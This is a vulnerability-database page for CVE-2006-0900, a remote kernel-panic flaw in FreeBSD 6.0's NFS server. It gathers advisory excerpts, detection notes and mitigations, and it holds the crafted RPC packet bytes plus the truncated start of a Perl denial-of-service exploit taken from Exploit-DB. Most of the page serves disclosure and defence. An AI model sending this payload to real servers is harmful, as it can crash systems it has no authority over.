CVE-2006-0900
published 2006-02-27CVE-2006-0900: nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.
PriorityP341high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
64.37%
99.1th percentile
nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x2f\x74\x6d\x70
- →Trigger condition is a TCP NFS RPC message to port 2049 with a zero-length payload, causing a NULL pointer dereference and kernel panic in nfsd. ↗
- →The exploit payload targets RPC program number 0x000186a5 (NFS mountd, decimal 100005) over TCP port 2049; monitor for crafted RPC MOUNT requests with this program number and zero-length or malformed payloads. ↗
- →The kernel will only process the malicious RPC messages if a userland nfsd daemon is running; detection should confirm nfsd is active on the target. ↗
- ·Vulnerability is only exploitable when the NFS server is enabled and the nfsd daemon is running; disabling NFS server (nfs_server_enable=NO in /etc/rc.conf) or killing mountd/nfsd processes mitigates the risk. ↗
- ·Firewall rules blocking RPC traffic to the NFS server from untrusted hosts serve as an effective network-level workaround. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6g68-8547-vmxp: nfsd in FreeBSD 6
ghsa_unreviewed·2022-05-03
CVE-2006-0900 [HIGH] GHSA-6g68-8547-vmxp: nfsd in FreeBSD 6
nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.
BSD
FreeBSD-SA-06:10.nfs: Remote denial of service in NFS server
bsd_advisories·2006-03-01·CVSS 7.8
CVE-2006-0900 [HIGH] FreeBSD-SA-06:10.nfs: Remote denial of service in NFS server
FreeBSD-SA-06:10.nfs Security Advisory
The FreeBSD Project
Topic: Remote denial of service in NFS server
Category: core
Module: sys_nfsserver
Announced: 2006-03-01
Credits: Evgeny Legerov
Affects: All FreeBSD releases.
Corrected: 2006-03-01 14:18:11 UTC (RELENG_6, 6.1-PRERELEASE)
2006-03-01 14:18:46 UTC (RELENG_6_0, 6.0-RELEASE-p5)
2006-03-01 14:19:48 UTC (RELENG_5, 5.5-PRERELEASE)
2006-03-01 14:21:01 UTC (RELENG_5_4, 5.4-RELEASE-p12)
2006-03-01 14:24:52 UTC (RELENG_5_3, 5.3-RELEASE-p27)
2006-03-01 14:21:56 UTC (RELENG_4, 4.11-STABLE)
2006-03-01 14:22:30 UTC (RELENG_4_11, 4.11-RELEASE-p15)
2006-03-01 14:23:07 UTC (RELENG_4_10, 4.10-RELEASE-p21)
CVE Name: CVE-2006-0900
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security bran
No detection rules found.
Exploit-DB
FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)
exploitdb·2006-02-28
CVE-2006-0900 FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)
FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)
---
#!/usr/bin/perl
## Saw an advisory on Dailydave and wrote a little script to
## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com)
##
## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.
## Evgeny Legerov
## www.gleg.net
use IO::Socket;
sub usage
{
print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n";
print "Advisory from Evgeny Legerov (www.gleg.net)\n";
print "Code by str0ke (milw0rm.com)\n";
print "Usage: $0 www.example.com\n";
exit ();
}
my $host = shift || &usage;
my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" .
"\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" .
"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x00\
Metasploit
FreeBSD Remote NFS RPC Request Denial of Service
metasploit
FreeBSD Remote NFS RPC Request Denial of Service
FreeBSD Remote NFS RPC Request Denial of Service
This module sends a specially-crafted NFS Mount request causing a kernel panic on host running FreeBSD 6.0.
No writeups or analysis indexed.
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:10.nfs.aschttp://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.htmlhttp://secunia.com/advisories/19017http://securityreason.com/securityalert/521http://www.osvdb.org/23511http://www.securityfocus.com/bid/16838https://exchange.xforce.ibmcloud.com/vulnerabilities/24918ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:10.nfs.aschttp://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.htmlhttp://secunia.com/advisories/19017http://securityreason.com/securityalert/521http://www.osvdb.org/23511http://www.securityfocus.com/bid/16838https://exchange.xforce.ibmcloud.com/vulnerabilities/24918
2006-02-27
Published